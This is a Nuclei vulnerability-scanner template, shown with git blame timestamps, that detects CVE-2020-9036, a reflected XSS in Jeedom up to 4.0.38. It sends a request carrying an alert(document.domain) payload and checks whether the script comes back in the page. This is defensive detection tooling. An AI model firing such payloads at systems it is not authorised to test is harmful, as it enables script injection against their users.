nuclei-templates/cves/2020/CVE-2020-9036.yaml

32 lines
727 B
YAML
Raw Normal View History

2021-07-27 06:45:01 +00:00
id: CVE-2020-9036
info:
2021-07-27 11:42:32 +00:00
name: Jeedom through 4.0.38 allows XSS
2021-07-27 06:45:01 +00:00
author: pikpikcu
severity: medium
reference:
2021-07-27 11:42:32 +00:00
- https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9036
2021-07-27 06:45:01 +00:00
tags: cve,cve2020,xss,jeedom
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"
matchers-condition: and
matchers:
- type: word
words:
2021-07-27 11:42:32 +00:00
- '<script>document.title = "";alert(document.domain);" - Jeedom"</script>'
2021-07-27 06:45:01 +00:00
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html